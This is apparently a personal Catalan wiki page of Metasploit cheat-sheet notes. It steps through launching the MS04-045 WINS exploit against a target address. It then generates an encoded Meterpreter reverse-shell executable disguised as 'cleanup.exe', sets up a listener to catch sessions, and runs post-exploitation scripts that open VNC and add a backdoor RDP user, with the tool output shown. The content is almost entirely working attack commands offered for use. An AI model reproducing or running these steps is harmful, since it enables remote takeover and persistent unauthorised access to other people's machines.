Metasploit
From Whats notepad
La millor interficié és:
msfconsole
Per veure les opcions avançades tant de payloads com exploits:
use use wins_ms04_045 show advanced
[edit] ÚS
Informació de l'exploit
info use wins_ms04_045
El carreguem al nostre entorn
use use wins_ms04_045
El configurem
set RHOST 192.168.0.1
Mostrem els objectius possibles
show targets
Triem un objectiu
set TARGET 2
Mostrem els payloads
show payloads
Mirem l'info dels payload
info win32_passivex
Triem payload
PAYLOAD win32_passivex
En mirem les opcions
show options
Mirem que les opcions siguin correctes i si la màquina és vulnerable
check
Executem l'exploit
exploit
[edit] Meterpreter
Generar un executable per establir una sessió inversa al meterpreter
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.99 R | msfencode -e x86/shikata_ga_nai -c 6 -t exe > cleanup.exe
Quedar esperant sessions de meterpreter
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set lhost 0.0.0.0 exploit
Llençar un servidor vnc
meterpreter> run vnc
Activar rdesktop i afegir un user
meterpreter> run getgui -u whats -p hehe -l en_EN [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Language detection started [*] Language detected: en_US [*] Setting user account for logon [*] Adding User: whats with Password: hehe [*] Adding User: whats to local group [*] Adding User: whats to local group [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110123.3855.rc
[edit] links
Curs interessant de metasploit
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
